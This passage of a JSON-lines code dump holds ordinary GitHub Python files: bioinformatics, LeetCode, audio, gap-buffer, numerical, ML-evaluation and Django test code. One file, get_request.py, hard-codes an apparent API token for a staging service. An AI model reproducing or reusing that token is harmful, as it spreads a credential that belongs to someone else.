\"))\n\nDNA = str(sequence.upper())\n\n# Count the number of each kmer\n# Produce dictionary with (kmer, number of times) pairs in counts\n\ncounts = {}\n\nfor i in range(0, len(DNA) - k + 1):\n\tkmer = DNA[i:i + k]\n\tif kmer in counts:\n\t\tcounts[kmer] += 1\n\telse:\n\t\tcounts[kmer] = 1\n\n# print(counts)\n# print(counts.values())\n\n# Eliminate all pairs that appear less than t times; new dict called frequent\n\nfrequent = {}\n\nfor k in counts:\n\tif counts[k] >= t:\n\t\tfrequent[k] = counts[k]\n\nanswer = frequent.keys()\noutput = ' '.join(answer)\nprint(output)","repo_name":"edaaydinea/Bioinformatics-Specialization","sub_path":"Finding Hidden Messages in DNA (Bioinformatics I)/Week 1/ClumpFinding.py","file_name":"ClumpFinding.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"21474758709","text":"class Solution:\n def shortestCommonSupersequence(self, str1: str, str2: str) -> str:\n # 0 -> up, 1 -> left, 2 -> diagonal\n f = [[len(str1) + len(str2) for j in range(len(str2) + 1)] for i in range(len(str1) + 1)]\n ans = [[-1 for j in range(len(str2) + 1)] for i in range(len(str1) + 1)]\n for i in range(len(str1) + 1):\n f[i][0] = i\n if i != 0: ans[i][0] = 0\n for j in range(len(str2) + 1):\n f[0][j] = j\n if j != 0: ans[0][j] = 1\n\n for i in range(1, len(str1) + 1):\n for j in range(1, len(str2) + 1):\n if str1[i-1] == str2[j-1]:\n f[i][j] = f[i-1][j-1] + 1\n ans[i][j] = 2\n if f[i-1][j] + 1 < f[i][j]:\n f[i][j] = f[i-1][j] + 1\n ans[i][j] = 0\n if f[i][j-1] + 1 < f[i][j]:\n f[i][j] = f[i][j-1] + 1\n ans[i][j] = 1\n\n ansStr = \"\"\n i, j = len(str1), len(str2)\n while ans[i][j] != -1:\n c = \"\"\n if ans[i][j] == 0:\n c = str1[i-1]\n i -= 1\n elif ans[i][j] == 1:\n c = str2[j-1]\n j -= 1\n else:\n c = str1[i-1]\n i -= 1\n j -= 1\n ansStr = c + ansStr\n return ansStr\n \n","repo_name":"notruilin/LeetCode","sub_path":"1092. 
Shortest Common Supersequence/shortestCommonSupersequence.py","file_name":"shortestCommonSupersequence.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72044681832","text":"import pyaudio\nimport numpy as np\nimport wave\nimport os\n\nclass AudioProcessing():\n def __init__(self):\n self.FORMAT= pyaudio.paInt16\n self.CHUNK = 1024\n self.RATE = 44100\n self.CHANNEL = 1\n self.frames=[]\n self.sample = np.zeros([102400])\n self.freq = np.fft.rfftfreq(1024, 1 / self.RATE)\n self.spec = np.zeros([1024], dtype=complex)\n self.pa = pyaudio.PyAudio()\n self.openRecordStream(0)\n self.play_data = None\n\n def openRecordStream(self, deviceidx):\n self.stream = self.pa.open(format=self.FORMAT,\n channels=self.CHANNEL,\n rate=self.RATE,\n input=True,\n output=True,\n input_device_index=deviceidx,\n stream_callback=self.recordCallback)\n print(self.pa.get_device_info_by_index((deviceidx)))\n\n\n def closeStream(self):\n self.stream.close()\n del self.stream\n\n def recordCallback(self, in_data, frame_count, time_info, flag):\n self.frames.append(in_data)\n in_data = np.fromstring(in_data, np.int16)\n for i in np.arange(99, 0, -1):\n self.sample[i*1024 : (i+1) * 1024] = self.sample[(i-1) * 1024 : i*1024] # shift the stored samples back by one chunk\n self.sample[0:1024] = in_data # put the new chunk at the front\n # fft\n self.spec = np.fft.rfft(self.sample[0:1024])\n return (in_data, pyaudio.paContinue)\n\n def start_stream(self):\n self.frames=[]\n self.stream.start_stream()\n return self\n\n\n def stop_stream(self):\n self.stream.stop_stream()\n wf = wave.open('temp/temp.wav', 'wb')\n wf.setnchannels(self.CHANNEL)\n wf.setsampwidth(self.pa.get_sample_size(self.FORMAT))\n wf.setframerate(self.RATE)\n wf.writeframes(b''.join(self.frames))\n wf.close()\n print('recording is done......')\n return self\n\n def openPlayStream(self, format, channels, rate, callback=None):\n #self.playwf = wave.open('temp.wav', 'rb')\n pa = pyaudio.PyAudio()\n playable_stream = pa.open(format=pa.get_format_from_width(format),\n channels=channels,\n rate=rate,\n output=True,\n stream_callback=callback)\n return playable_stream\n\n # known issue: broken, kept disabled\n '''\n def playCallback(self, in_data, frame_count, time_info, status):\n self.play_data = self.playwf.readframes(frame_count)\n\n if self.play_data==b'':\n self.playwf.close()\n else:\n data = np.fromstring(self.play_data, np.int16)\n self.sample[0:1024] = data\n self.spec = np.fft.rfft(self.sample[0:1024])\n\n return (self.play_data, pyaudio.paContinue)\n\n '''\n def deleteWav(self):\n if os.path.exists('temp/temp.wav'):\n os.remove('temp/temp.wav')\n else:\n print('cannot find \"temp.wav\"')\n\n\n# test\nif __name__ == '__main__':\n pa = pyaudio.PyAudio()\n\n devicelst = []\n for idx in range(pa.get_device_count()):\n devicelst.append(pa.get_device_info_by_index(idx))\n\n for info in devicelst:\n if info['maxInputChannels'] != 0 and info['hostApi'] == 0:\n print(info)\n\n #ap = AudioProcessing()\n #ap.openRecordStream()\n #ap.start_stream()\n #time.sleep(5)\n #ap.stop_stream()\n #ap.stream.close()\n","repo_name":"aod1310/classical_music_auto_composition","sub_path":"AudioProcessing.py","file_name":"AudioProcessing.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16572908893","text":"from enum import Enum\n\n\nclass CellType(Enum):\n GAP = 1\n ENDFILE = 2\n\n
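\n# A classic gap buffer: the cursor sits inside a run of free GAP cells, so\n# repeated inserts and deletes at one position avoid shifting the whole list.\n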
class GapBuffor:\n def __init__(self):\n self.gap_size = 16\n self.buffor = [CellType.GAP] * self.gap_size\n self.current_gap_size = self.gap_size\n self.cursor = 0\n\n def write(self, text: str) -> None:\n for ch in text:\n self.buffor[self.cursor] = ch\n self.cursor += 1\n self.current_gap_size -= 1\n\n if self.current_gap_size <= 0:\n last_index = len(self.buffor) - 1\n self.current_gap_size = self.gap_size\n self.buffor += [CellType.GAP] * self.gap_size\n for i in range((last_index + 1) - self.cursor):\n start = last_index - i\n end = last_index + self.gap_size - i\n self.buffor[start], self.buffor[end] = self.buffor[end], self.buffor[start]\n\n def move_cursor(self, x: int) -> None:\n if x == 0:\n return\n elif x > 0:\n missed_space = self.cursor + self.current_gap_size + x - len(self.buffor)\n if missed_space > 0:\n return\n start = self.cursor\n end = self.cursor + self.current_gap_size\n for _ in range(x):\n self.buffor[start] = self.buffor[end]\n self.buffor[end] = CellType.GAP\n start += 1\n end += 1\n self.cursor += x\n else:\n start = self.cursor - 1\n end = self.cursor + self.current_gap_size - 1\n for _ in range(-x):\n if self.cursor <= 0:\n break\n self.cursor -= 1\n self.buffor[end] = self.buffor[start]\n self.buffor[start] = CellType.GAP\n start -= 1\n end -= 1\n\n def delete(self, amount: int) -> None:\n if amount > 0:\n self.buffor = self.buffor[:max(self.cursor - amount, 0)] + self.buffor[self.cursor:]\n self.cursor -= amount\n if self.cursor < 0:\n self.cursor = 0\n\n def get_char(self, index: int):  # returns a stored character or CellType.ENDFILE\n if index == len(self.buffor):\n return CellType.ENDFILE\n return self.buffor[index]\n\n def clear(self) -> None:\n self.buffor.clear()\n self.buffor = [CellType.GAP] * self.gap_size\n self.current_gap_size = self.gap_size\n self.cursor = 0\n\n def load(self, data: str) -> None:\n self.clear()\n self.buffor += list(data)\n\n def get_text(self) -> str:\n res = ''\n for cell in self.buffor:\n if type(cell) == str:\n res += cell\n return res\n","repo_name":"dixtel/gapbuffer","sub_path":"gapbuffer.py","file_name":"gapbuffer.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14142413200","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nProgramming 4 Template\r\n\r\nRefer to the instructions on Canvas for more information.\r\n\r\n\"I have neither given nor received help on this assignment.\"\r\nauthor: Inhan Park\r\n\"\"\"\r\n__version__ = 1\r\n\r\ndef extraEnd(string): \r\n '''\r\n Given a string, return a new string made of 3 copies of the last 2 characters of the \r\n original string. The original string's length will be at least 2.\r\n '''\r\n temp = string[-2:]\r\n temp = temp + temp + temp\r\n return temp\r\n\r\n\r\n\r\ndef without2(string):\r\n '''\r\n\tGiven a string, if the same 2-character substring appears at both its beginning and \r\n end, return the contents of the string without the 2-character substring at the beginning. \r\n For example, \"HelloHe\" yields \"lloHe\". Note that the 2-character substring at the \r\n beginning may overlap with the one at the end, so \"Hi\" yields \"\". 
If the two characters \r\n at the start and end of the string do not match each other, return the original string \r\n unchanged.\r\n\t'''\r\n if string[:2] == string[-2:]:\r\n return string[2:]\r\n return string\r\n\r\n\r\n######################################################################################\r\n\r\ndef main():\r\n # You can test your solutions by calling them from here\r\n assert extraEnd(\"example\") == 'lelele', \"return 3 copies of the last 2 characters of the original string\"\r\n assert without2(\"HelloHe\") == 'lloHe', 'remove 2-character substring at beginning if same with 2-character at end'\r\n assert without2('lloHe') == 'lloHe', 'return original string if 2-character substring at beginning and end not match'\r\n \r\nif __name__ == \"__main__\":\r\n main() ","repo_name":"inhanp/Python_program","sub_path":"programming/programming04.py","file_name":"programming04.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7932064084","text":"import pandas as pd\nimport scipy as sp\nimport matplotlib.pyplot as plt\nfrom io import StringIO\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom derivativesfedrick_hw6 import *\nfrom integrationfedrick_hw6 import *\nfrom nonlinequationfedrick_hw6 import *\n#function for relaxation method rearranged\ndef f(X):\n a=1\n b=2\n x=X[0]\n y=X[1]\n A=[]\n for l in X:\n A.append(0)\n A[0]=((b/y)-a)**0.5\n A[1]=x/(a + x**2)\n #X[1]=((a+b**2)/b)*(y**2)\n return A\n#function for newton raphson method\ndef f1(X):\n a=1\n b=2\n x=X[0]\n y=X[1]\n A=[]\n for l in X:\n A.append(0)\n A[0]=((b/y)-a)**0.5-x\n A[1]=x/(a + x**2)-y\n #X[1]=((a+b**2)/b)*(y**2)\n return A\n#computes the jacobian matrix for the newton raphson system\ndef J(X):\n a=16\n b=2\n x=X[0]\n y=X[1]\n f1dxa=2*(x**3)*y+2*x*y*(a+x**2)\n f1dxb=(y*(a+x**2))**2\n #f1dx=(f1dxa/f1dxb)-1\n f1dx=-1\n #f1dy=(-(x**2))/((y**2)*(a+x**2))\n f1dy=0\n row1=[f1dx,f1dy]\n #f2dx=(2*x*(y**2))/b\n f2dx=((a+x**2)-(2*x**2))/((a+x**2)**2)\n #f2dy=2*((a+x**2)/b)*y-1\n f2dy=-1\n row2=[f2dx,f2dy]\n j=np.array([row1,row2])\n return j\n# output iteration counts and results\nr,ri=relax([-100,100],f, 1e-6)\nnr, nri=NRsys(f1,J,1e-6,[-100,100])\n\nprint(\"this is the solution using relaxation: \"+ str(np.array(r).real)+\" with \"+str(ri)+\" iterations\")\nprint(\"this is the solution using newton raphson: \"+ str(np.array(nr).real)+\" with \"+str(nri)+\" iterations\")\n","repo_name":"sfedrick/computationphysics","sub_path":"homework6/6_12fedrick_hw6.py","file_name":"6_12fedrick_hw6.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7243607096","text":"# A quick function to capture the masses of each component in an OpenRocket .rkt model\r\n# and to produce a mass breakdown\r\n\r\nfrom prettytable import PrettyTable as pt\r\nimport csv\r\n\r\n\r\ndef massBreakdown(path, boosters, propellant):\r\n components = [\"Boosters\", \"Propellant\"]\r\n masses = [boosters, propellant]\r\n raw = []\r\n\r\n with open(path, 'r') as f: # (Sporadic_Impulse1.rkt)\r\n\r\n for i in range(0, 2000, 2):\r\n data = f.readline()\r\n if data == '':\r\n break\r\n raw.append(data.lstrip())\r\n\r\n for j in range(5, len(raw)): # 5 is to prevent 'rocket' appearing as a component\r\n if raw[j].startswith('<totalmass'):\r\n masses.append(float(raw[j][11:-13])/1000)\r\n if raw[j].startswith('<name'):\r\n components.append(raw[j][6:-8])\r\n\r\n x = pt()\r\n 
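# mirror the same component/mass rows into both the pretty table and the CSV\r\n 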
x.field_names = [\"Components\", \"Masses\"]\r\n\r\n with open(\"massBreakdown.csv\", \"w+\") as out:\r\n\r\n out_writer = csv.writer(out, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\r\n out_writer.writerow(['Component', 'Mass'])\r\n\r\n for i in range(0, len(masses)):\r\n x.add_row([components[i], masses[i]])\r\n out_writer.writerow([components[i], masses[i]])\r\n\r\n print(x)\r\n\r\n\r\n# Call\r\n\r\npath = input(\"Enter file path for .rkt model: \")\r\nb = float(input(\"Enter booster mass (kg): \"))\r\np = float(input(\"Enter the propellant mass (kg): \")) # Model the dry engine mass in an inner tube\r\n\r\nmassBreakdown(path, b, p)\r\n","repo_name":"icl-rocketry/OpenRocket-MassBreakdown","sub_path":"OpenRocketMassBreakdown.py","file_name":"OpenRocketMassBreakdown.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15154089919","text":"def main():\r\n a = [[int(s) for s in input().split()] for _ in range(4)]\r\n\r\n if solve(a):\r\n print('CONTINUE')\r\n else:\r\n print('GAMEOVER')\r\n\r\ndef solve(a):\r\n for r in range(4):\r\n for c in range(3):\r\n if a[r][c] == a[r][c+1]:\r\n return True\r\n\r\n for r in range(3):\r\n for c in range(4):\r\n if a[r][c] == a[r+1][c]:\r\n return True\r\n\r\n return False\r\n\r\nmain()","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc021/A/4351955.py","file_name":"4351955.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"141412429","text":"import shutil\nimport tempfile\nimport aiohttp.pytest_plugin\n\nimport pytest\n\nfrom load.projects.cloud.loadtesting.tools.logging.storage.src.storage import create_app\n\npytest_plugins = ['aiohttp.pytest_plugin']\ndel aiohttp.pytest_plugin.loop\n\n\n@pytest.fixture\ndef loop(event_loop):\n \"\"\"\n не разбирался как это работает.\n вместе с `del aiohttp.pytest_plugin.loop` стырено отсюда:\n https://a.yandex-team.ru/arc/trunk/arcadia/ads/emily/viewer/backend/tests/conftest.py?rev=r8704789#L23\n но без этого плагин 'aiohttp.pytest_plugin' не завёлся.\n \"\"\"\n return event_loop\n\n\n@pytest.fixture()\ndef dir_path():\n dirpath = tempfile.mkdtemp()\n try:\n yield dirpath\n finally:\n shutil.rmtree(dirpath)\n\n\n@pytest.fixture\nasync def client(aiohttp_client, dir_path):\n return await aiohttp_client(create_app(dir_path))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"load/tests/conftest (2).py","file_name":"conftest (2).py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3191210783","text":"import os\nimport numpy as np\nfrom PIL import Image\nfrom keras.preprocessing.image import load_img, img_to_array\nfrom predict import get_mask\nfrom keras import backend as K\nimport cv2\n\n\ndef iou_loss_core(y_true, y_pred, smooth=1):\n #https://www.kaggle.com/c/data-science-bowl-2018/discussion/51553\n intersection = K.sum(K.abs(y_true * y_pred), axis=-1)\n union = K.sum(y_true,-1) + K.sum(y_pred,-1) - intersection\n iou = (intersection + smooth) / ( union + smooth)\n return iou\n\n\n\ndef query_img_names(path=None, movement_no=None):\n img_names = os.listdir(path)\n wished_names = []\n for img_name in img_names:\n if img_name.endswith('.png'):\n if (movement_no is not None):\n splitted = img_name.split('-')\n index = int(splitted[len(splitted) - 2]) \n if index == 
movement_no:\n wished_names.append(path + '/' + img_name)\n else:\n wished_names.append(path + '/' + img_name)\n\n return wished_names\n\n\n\ndef measure_jaccard(model, img_names, nth_frame, img_width_height, optical_flow_dir):\n from sklearn.metrics import jaccard_score\n preds = []\n grounds = []\n for i, img_name in enumerate(img_names):\n ground_mask = img_to_array(load_img(img_name, color_mode='grayscale', interpolation='bilinear', target_size=(img_width_height,img_width_height,3)), dtype='uint8')\n ground_mask = ground_mask.flatten()\n rgb_img_name = img_name[:len(img_name) - 14] + '.jpg'\n sample = img_to_array(load_img(rgb_img_name, color_mode='rgb', interpolation='bilinear', target_size=(img_width_height,img_width_height,3)), dtype='uint8')\n x_inp = None\n ########\n if nth_frame > 0:\n x_inp = np.zeros((img_width_height, img_width_height, 5))\n #sample_gray = img_to_array(load_img(rgb_img_name, color_mode='grayscale', interpolation='bilinear', target_size=(img_width_height,img_width_height,3)), dtype='uint8')\n #only_img_name = rgb_img_name.split('/')[2]\n #splitted_name = only_img_name.split('-')\n #next_frame_name = optical_flow_dir + splitted_name[0] + '-' + str(int(splitted_name[1]) + nth_frame) + '-' + splitted_name[2]\n #sample_gray_next = img_to_array(load_img(next_frame_name, color_mode='grayscale', interpolation='bilinear', target_size=(img_width_height,img_width_height,3)), dtype='uint8')\n #flow = cv2.calcOpticalFlowFarneback(sample_gray,sample_gray_next, None, 0.5, 3, 15, 3, 5, 1.2, 0)\n #mag, ang = cv2.cartToPolar(flow[...,0], flow[...,1])\n #ang = ang*180/np.pi/2 # need to be normalized, just like normal rgb hand images. it will be normalized below.\n #mag = cv2.normalize(mag,None,0,255,cv2.NORM_MINMAX) # need to be normalized, just like normal rgb hand images. 
it will be normalized below.\n            # UnetDataset_v4/test/HIJEL_3004 (12)-506-0.jpg\n            x_inp[:,:,0:3] = sample \n            #print(optical_flow_dir + img_name.split('/')[2][:len(img_name.split('/')[2]) - 14] + '.jpg')\n            optical_flow_img = cv2.imread(optical_flow_dir + img_name.split('/')[2][:len(img_name.split('/')[2]) - 14] + '.jpg')\n            optical_flow_img_hsv = cv2.cvtColor(optical_flow_img, cv2.COLOR_BGR2HSV) \n            x_inp[:,:,3] = optical_flow_img_hsv[:,:,0] \n            x_inp[:,:,4] = optical_flow_img_hsv[:,:,2] \n        else:\n            x_inp = sample\n        ######## \n        segmented_pred = get_mask(model, x_inp, nth_frame)\n        segmented_pred = segmented_pred.flatten()\n        \n        preds = np.concatenate((np.array(preds), segmented_pred))\n        grounds = np.concatenate((np.array(grounds), ground_mask))\n    preds = preds / 255 # reduce the 0 and 255 values to 0 and 1 so that jaccard_score can run in binary mode\n    grounds = np.around(grounds / 255)\n    return jaccard_score(y_pred=preds, y_true=grounds)\n\n\n","repo_name":"hizircanbayram/Graduation-Project","sub_path":"UNet/Model/measure_jaccard.py","file_name":"measure_jaccard.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38915268981","text":"# _*_ coding:utf8 _*_\nimport requests\nimport json\nfrom Myproject.Tools import signature\n\nclass RunMain:\n    # Initialize the instance\n    def __init__(self,headers,u,method,data=None):\n        self.res = self.run_main(headers,u,method,data)\n\n    # Wrap a GET request method\n    def send_get(self,headers,u,data):\n        res = requests.get(headers=headers,url=u,data=data).json()\n        return res\n\n    # Wrap a POST request method\n    def send_post(self,headers,u,data=None):\n        res = requests.post(headers=headers,url=u,data=data).json()\n        # return json.dumps(res,indent=2,sort_keys=True)\n        return res\n\n    # A dispatch method: send a GET request when method is 'get', otherwise send a POST request\n    def run_main(self,headers,u,method,data=None):\n        res = None\n        if method == 'get':\n            res = self.send_get(headers,u,data)\n        else:\n            res = self.send_post(headers,u,data)\n        return res\n\n\nif __name__ == '__main__':\n    param = \"campDateId\" + \"345718657178255935\" + \"classId\" + \"\" + \"groupId\" + \"\" + \"pageNo\" + \"1\" + \"pageSize\" + \"20\" + \"tagType\" + \"\" + \"orderBy\" + \"selfTag\"\n    token = 'c673018d7ed9b1f6b96645c9158c9f40'\n    S = signature.signature()\n    sign = S.s(param,token)\n    headers = {\n    'Content-Type': 'application/json;charset=UTF-8',\n    'token': token,\n    'signature':sign\n}\n    url = 'https://presmartapi.kakahui.net/knowledge-smart-crm/api/v1/realTimeKanBan/queryHitKeyWordsList'\n    data = {\"campDateId\":\"345718657178255935\",\"classId\":\"\",\"groupId\":\"\",\"pageNo\":1,\"pageSize\":20,\"tagType\":\"\",\"orderBy\":\"selfTag\"}\n    data = json.dumps(data,ensure_ascii=False).encode('utf8').decode('latin1')\n    run = RunMain(headers,url,'get',data)\n# res = RunMain.send_post(data,url)\n# print(res)\n# print(run.res)\n\n    u_test = 'http://testsjob.kakahui.net/api/v1/fetchCampController/fetchRealTimeData'\n    # data_test = {'type': '1',\n    #              'packageId': '353254591846445079',\n    #              'proCode': 'WM180F',\n    #              'classId': '351404578921033923',\n    #              'wechatType': '1',\n    #              'scanQr': '1',\n    #              'qrCodeType': '0'\n    #              }\n    data_test = {}\n    run_test = RunMain(headers, u_test, 'post', data_test)\n    print(run_test.res)","repo_name":"youlong533/Myproject","sub_path":"Tools/get_request.py","file_name":"get_request.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4762254262","text":"import 
numpy as np\nfrom pprint import pprint\nimport sys\nimport pandas as pd\nfrom classification import Classification\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.experimental import enable_halving_search_cv\nfrom sklearn.model_selection import HalvingGridSearchCV\nfrom sklearn.metrics import classification_report\nimport joblib\nimport os\nimport json\nfrom classify_all import get_features as gf\nimport datetime\n\n\ndef grid_randfor(X_train, Y_train):\n    # Number of trees in random forest\n    n_estimators = [int(x) for x in np.linspace(start=200, stop=2000, num=10)]\n    # Number of features to consider at every split\n    max_features = ['auto', 'sqrt']\n    # Maximum number of levels in tree\n    max_depth = [int(x) for x in np.linspace(10, 110, num=11)]\n    max_depth.append(None)\n    # Minimum number of samples required to split a node\n    min_samples_split = [2, 5, 10]\n    # Minimum number of samples required at each leaf node\n    min_samples_leaf = [1, 2, 4]\n    # Method of selecting samples for training each tree\n    bootstrap = [True, False]  # Create the random grid\n    random_grid = {'n_estimators': n_estimators,\n                   'max_features': max_features,\n                   'max_depth': max_depth,\n                   'min_samples_split': min_samples_split,\n                   'min_samples_leaf': min_samples_leaf,\n                   'bootstrap': bootstrap}\n\n    pprint(random_grid)\n\n    clf = RandomForestClassifier()\n\n    halving_cv = HalvingGridSearchCV(\n        clf, random_grid, scoring=\"f1_macro\", n_jobs=-1, min_resources=\"exhaust\", factor=3)\n\n    halving_cv.fit(X_train, Y_train)\n\n    best_estimator = halving_cv.best_estimator_\n    best_score = halving_cv.best_score_\n    best_params = halving_cv.best_params_\n\n    return (best_estimator, best_score, best_params)\n\n\ndef grid_svm(X_train, Y_train):\n    param_grid = {\n        'C': np.arange(0.01, 100, 10)\n    }\n\n    clf = LinearSVC()\n    halving_cv = HalvingGridSearchCV(\n        clf, param_grid, scoring=\"f1_macro\", n_jobs=-1, min_resources=\"exhaust\", factor=3)\n\n    halving_cv.fit(X_train, Y_train)\n\n    best_estimator = halving_cv.best_estimator_\n    best_score = halving_cv.best_score_\n    best_params = halving_cv.best_params_\n\n    return (best_estimator, best_score, best_params)\n\n\ndef get_features(domain, normalize=True):\n    train_apps = 'features/features_apps_train.csv'\n    test_apps = 'features/features_apps_test.csv'\n\n    train_filmes = 'features/features_movies_train.csv'\n    test_filmes = 'features/features_movies_test.csv'\n\n    features_df_train = None\n    features_df_test = None\n\n    if domain == 'apps':\n        features_df_train = pd.read_csv(train_apps, index_col=0)\n        features_df_test = pd.read_csv(test_apps, index_col=0)\n        columns = features_df_train.columns\n    elif domain == 'movies':\n        features_df_train = pd.read_csv(train_filmes, index_col=0)\n        features_df_test = pd.read_csv(test_filmes, index_col=0)\n        columns = features_df_train.columns\n    else:\n        print(\"Check the domain, exiting\")\n        exit()\n\n    count_class_0, count_class_1 = features_df_train.helpfulness.value_counts()\n    df_class_0 = features_df_train[features_df_train['helpfulness'] == 0]\n    df_class_1 = features_df_train[features_df_train['helpfulness'] == 1]\n    df_class_0_under = df_class_0.sample(count_class_1)\n    ##\n    # df_class_0_under = df_class_0.sample(limit_test)\n    # df_class_1_under = df_class_1.sample(limit_test)\n    # df_train_under = pd.concat([df_class_0_under, df_class_1_under], axis=0)\n    ##\n    df_train_under = pd.concat([df_class_0_under, df_class_1], axis=0)\n\n    # df_train_under = pd.read_pickle('train_t.pkl')\n\n    count_class_0, count_class_1 = 
features_df_test.helpfulness.value_counts()\n    df_class_0 = features_df_test[features_df_test['helpfulness'] == 0]\n    df_class_1 = features_df_test[features_df_test['helpfulness'] == 1]\n    df_class_0_under = df_class_0.sample(count_class_1)\n\n    df_test_under = pd.concat([df_class_0_under, df_class_1], axis=0)\n\n    if normalize:\n        X_train = Classification.normalize(df_train_under.iloc[:, 0:-1])\n        X_test = Classification.normalize(df_test_under.iloc[:, 0:-1])\n    else:\n        X_train = df_train_under.iloc[:, 0:-1]\n        X_test = df_test_under.iloc[:, 0:-1]\n\n    Y_train = df_train_under['helpfulness']\n    Y_test = df_test_under['helpfulness']\n\n    return X_train, Y_train, X_test, Y_test\n\n\nprint(datetime.datetime.now())\n\ndomain = sys.argv[1]\nmodel_folder = sys.argv[2]\nmethod = sys.argv[3]\nsel_features = sys.argv[4]\n# result_folder = sys.argv[4]\n# sel_features = sys.argv[5]\n\nif sel_features == 'all':\n    df_train, df_test = gf(domain)\n    X_train = df_train.iloc[:, 0:-1].fillna(0)\n    Y_train = df_train['helpfulness']\n    X_test = df_test.iloc[:, 0:-1].fillna(0)\n    Y_test = df_test['helpfulness']\nelif sel_features == 'hand':\n    X_train, Y_train, X_test, Y_test = get_features(domain)\n\nif method == 'rf':\n    clf, score, params = grid_randfor(\n        X_train, Y_train)\nelif method == 'svm':\n    clf, score, params = grid_svm(\n        X_train, Y_train)\nelse:\n    print(\"Invalid method\")\n    exit()\n\ny_pred = clf.predict(X_test)\n\n\nresultado = classification_report(\n    Y_test, y_pred, output_dict=True)\n\nwith open(os.sep.join([model_folder, '%s_grid_%s_%s.result' % (method, domain, sel_features)]), 'w') as f:\n    json.dump(resultado, f)\n\nwith open(os.sep.join(\n        [model_folder, '%s_model_grid_%s_%s.params' % (method, domain, sel_features)]), 'w') as f:\n    f.write(str(score)+'\\n')\n    f.write(str(params)+'\\n')\n\n\njoblib.dump(clf, os.sep.join(\n    [model_folder, '%s_model_grid_%s_%s.model' % (method, domain, sel_features)]))\n\nprint(datetime.datetime.now())\n","repo_name":"RogerFig/features_experiments","sub_path":"grid_search.py","file_name":"grid_search.py","file_ext":"py","file_size_in_byte":5761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13186970924","text":"class Solution:\n    def __init__(self):\n        pass\n\n    def my_solution(self, lst):\n        \"\"\"\n        precomputed left/right running-max arrays\n        \"\"\"\n        if len(lst) < 2:\n            return 0\n\n        tot = 0\n        left_max_arr = [0 for _ in lst]\n        right_max_arr = [0 for _ in lst]\n\n        left_max = 0\n        for idx, val in enumerate(lst):\n            left_max = max(val, left_max)\n            left_max_arr[idx] = left_max\n\n        right_max = 0\n        for idx in range(len(lst)-1, -1, -1):\n            right_max = max(lst[idx], right_max)\n            right_max_arr[idx] = right_max\n\n        for idx, val in enumerate(lst):\n            tot += min(left_max_arr[idx], right_max_arr[idx]) - val\n\n        return tot\n\n    def better_solution(self, arr):\n        \"\"\"\n        two passes converging on the global maximum\n        \"\"\"\n        if len(arr) < 2:\n            return 0\n\n        total = 0\n        max_i = arr.index(max(arr))\n\n        left_max = arr[0]\n        for num in arr[1:max_i]:\n            left_max = max(left_max, num)\n            print(\"left\", left_max - num)\n            print(\"tot\", total)\n            total += left_max - num\n\n        right_max = arr[-1]\n        for num in arr[-2:max_i:-1]:\n            right_max = max(right_max, num)\n            print(\"right\", right_max - num)\n            total += right_max - num\n\n        return total\n","repo_name":"wenhaoz-fengcai/dailycoding","sub_path":"src/prob30.py","file_name":"prob30.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"22597215006","text":"from django.test.testcases import TransactionTestCase\nfrom django.utils import unittest\nfrom django.utils.unittest.suite import TestSuite\nfrom accounts.tests.api import register_api_call, auth_api_call\nfrom cards.models import Card\nfrom cards.tests.api import create_card_api_call, delete_card_api_call\nfrom libs.version.context import version_context_manager\nfrom vaults.tests.api import create_vault_api_call, delete_vault_api_call\nfrom workspaces.tests.api import create_workspace_api_call, \\\n delete_workspace_api_call\n\n\nclass CardSoftDeleteTest(TransactionTestCase):\n\n def setUp(self):\n version_context_manager.set_enabled(False)\n\n def create_card(self):\n # create user\n email = 'jan@rclick.cz'\n register_api_call(email=email, nickname='Misan').data\n user1token = auth_api_call(email=email).data.get('token')\n\n # create workspace\n workspace = create_workspace_api_call(\n user1token, name='workspace').data\n\n #create vault\n vault = create_vault_api_call(user1token,\n name=\"vault_in_workspace\",\n workspace=workspace.get('id')\n ).data\n\n #create card\n card = create_card_api_call(user1token,\n name=\"card_in_vault\",\n vault=vault.get('id')\n ).data\n\n return user1token, workspace, vault, card\n\n def test_010_softdelete(self):\n\n user1token, workspace, vault, card = list(self.create_card())\n\n delete_card_api_call(user1token, card.get('id'))\n\n cards = Card.objects.filter(id=card.get('id'))\n self.assertEquals(cards.count(), 0)\n\n cards = Card.objects.include_deleted().filter(id=card.get('id'))\n 